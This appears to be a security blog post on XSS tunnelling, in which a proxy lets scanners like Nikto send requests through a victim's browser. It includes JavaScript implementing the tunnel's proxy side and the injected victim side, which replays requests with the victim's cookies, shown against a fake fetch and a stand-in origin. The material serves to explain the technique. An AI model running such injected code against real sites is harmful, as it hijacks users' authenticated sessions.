web application security lab

XSS Proxy Tunnelling

Jason Wood alerted me to this one. Apparently Ferruh Mavituna has posted about a new tool he created to do XSS tunneling. At first blush it looks a lot like what Jeremiah Grossman built and what Billy Hoffman later re-created for Jikto, except that Ferruh’s is written in .NET instead of server-side scripts. “So what?” you say. Well, there is one aspect of this that actually is interesting and caught my eye.

He built his tool as a proxy, so that existing third-party scanning tools can be pointed at it without modification. So let’s say you’ve got Nikto, but you want your target to do the work for you. You point Nikto at this as its proxy and, poof, every request Nikto makes is replayed by JavaScript running in the victim’s browser: the victim is now under Nikto’s control, by way of XSS tunneling. Because it is the victim’s browser sending the requests, they go out with the victim’s cookies, and they can only reach the site the XSS fired on. Crazy, but cool. Ferruh’s also got a nice writeup and video to go along with it. Very cool stuff!
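To make the architecture concrete, here is an added example, written for this post and not Ferruh’s code, of the two halves of such a tunnel in JavaScript. The origin name victim.example, the job format, the function names and the fake fetch that stands in for the victim’s browser are all assumptions for illustration. The proxy half parses the raw request a scanner sends it and later rebuilds a raw response; the browser half is what the injected script would do with each job. Two properties make the trick work and bound it: fetch with credentials: "include" sends the victim’s cookies, and the same-origin policy means the scanner can only reach the origin where the XSS fired, so a request for any other host is refused at the proxy.

```javascript
// Added example (not the tool from the post): the two halves of an XSS tunnel
// proxy. Proxy side: scanner -> raw HTTP request -> job. Victim side: injected
// JavaScript replays the job with the victim's cookies. Proxy side again:
// result -> raw HTTP response back to the scanner. The origin, wire format,
// function names and the fake fetch below are all assumptions for illustration.

const TUNNEL_ORIGIN = "http://victim.example"; // assumed: origin where the XSS fired

// Headers the browser sets itself (and forbids scripts from setting) or that
// only matter on the scanner<->proxy hop; they never reach the victim side.
const FORBIDDEN = new Set([
  "host", "cookie", "content-length", "connection",
  "proxy-connection", "user-agent", "accept-encoding",
]);

// Proxy side: parse the proxy-form request a scanner such as Nikto sends.
// The request line carries an absolute URL; anything outside the XSS'd
// origin is refused here because the browser could not reach it anyway.
function parseRawRequest(raw) {
  const [head, body = ""] = raw.split("\r\n\r\n");
  const [requestLine, ...headerLines] = head.split("\r\n");
  const [method, target] = requestLine.split(" ");
  const url = new URL(target, TUNNEL_ORIGIN);
  if (url.origin !== TUNNEL_ORIGIN) {
    throw new Error(`same-origin policy: cannot tunnel to ${url.origin}`);
  }
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(":");
    if (i < 0) continue;
    const name = line.slice(0, i).trim().toLowerCase();
    if (!FORBIDDEN.has(name)) headers[name] = line.slice(i + 1).trim();
  }
  return { method, url: url.pathname + url.search, headers, body };
}

// Victim side: what the injected script does with one job. fetchImpl is a
// parameter so the logic runs under Node; in the payload it is window.fetch.
// credentials: "include" is what makes the victim's session ride along.
// fetch follows redirects silently, so the scanner sees the final page, not a 3xx.
async function runJob(job, fetchImpl = globalThis.fetch) {
  const res = await fetchImpl(TUNNEL_ORIGIN + job.url, {
    method: job.method,
    headers: job.headers,
    body: ["GET", "HEAD"].includes(job.method) ? undefined : job.body,
    credentials: "include",
  });
  const headers = {};
  res.headers.forEach((v, k) => { headers[k] = v; });
  return { status: res.status, statusText: res.statusText, headers, body: await res.text() };
}

// Proxy side: rebuild an HTTP/1.1 response so the scanner never sees a browser.
// The body was already decoded and de-chunked by the browser, so the framing
// headers are replaced by a fresh Content-Length.
function buildRawResponse(result) {
  const lines = [`HTTP/1.1 ${result.status} ${result.statusText || ""}`.trimEnd()];
  for (const [k, v] of Object.entries(result.headers)) {
    const name = k.toLowerCase();
    if (name === "transfer-encoding" || name === "content-length" || name === "content-encoding") continue;
    lines.push(`${k}: ${v}`);
  }
  const len = new TextEncoder().encode(result.body).length;
  lines.push(`Content-Length: ${len}`, "", result.body);
  return lines.join("\r\n");
}

// One round trip. The real tool puts a transport between runJob and the rest
// (victim polls for jobs, posts results back); here they are called directly.
async function tunnel(raw, fetchImpl) {
  return buildRawResponse(await runJob(parseRawRequest(raw), fetchImpl));
}

// Constructed stand-in for the victim browser's fetch (no network): a tiny
// application with one page that only a logged-in user would normally reach.
async function fakeVictimFetch(url, init) {
  const reply = (status, statusText, body) => ({
    status, statusText,
    headers: new Map([["content-type", "text/html"]]),
    text: async () => body,
  });
  if (init.credentials !== "include") return reply(401, "Unauthorized", "login required");
  if (new URL(url).pathname === "/admin/") return reply(200, "OK", "<h1>admin</h1>");
  return reply(404, "Not Found", "missing");
}

// Stand-alone run: a Nikto-style request in, a raw HTTP response out.
const SAMPLE_REQUEST =
  "GET http://victim.example/admin/ HTTP/1.1\r\n" +
  "Host: victim.example\r\nUser-Agent: Mozilla/5.0 (Nikto)\r\n\r\n";
tunnel(SAMPLE_REQUEST, fakeVictimFetch).then((r) => console.log(r));
```

Two practical limits show up even in this toy: the browser refuses to let a script set Host, Cookie or Content-Length, so those headers are dropped on the way in and any scanner check that depends on them will not behave as it does over a direct connection, and the scanner sees whatever the browser ends up with after following redirects, not the intermediate 3xx. The transport between attacker server and victim (polling for jobs, posting results back) is the part this block leaves out.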

2 Responses to “XSS Proxy Tunnelling”

  1. planadecu Says:

    I saw a similar tool at the OWASP conference in Milan. It’s a private tool used by the WatchFire pentesters. It was used in the Google Desktop Hack talk: http://www.owasp.org/images/8/86/OWASPAppSec2007Milan_OvertakingGoogleDesktop.ppt
    That tool consists of a “server” that tracks users who connect to a web page with malicious JavaScript that makes them connect to that tool. After that you can execute live JavaScript commands.

    Cool!

  2. hackathology Says:

    I just went through the video. I roughly understand what it tries to do; however, I have to read the PDF to totally understand the whole thing.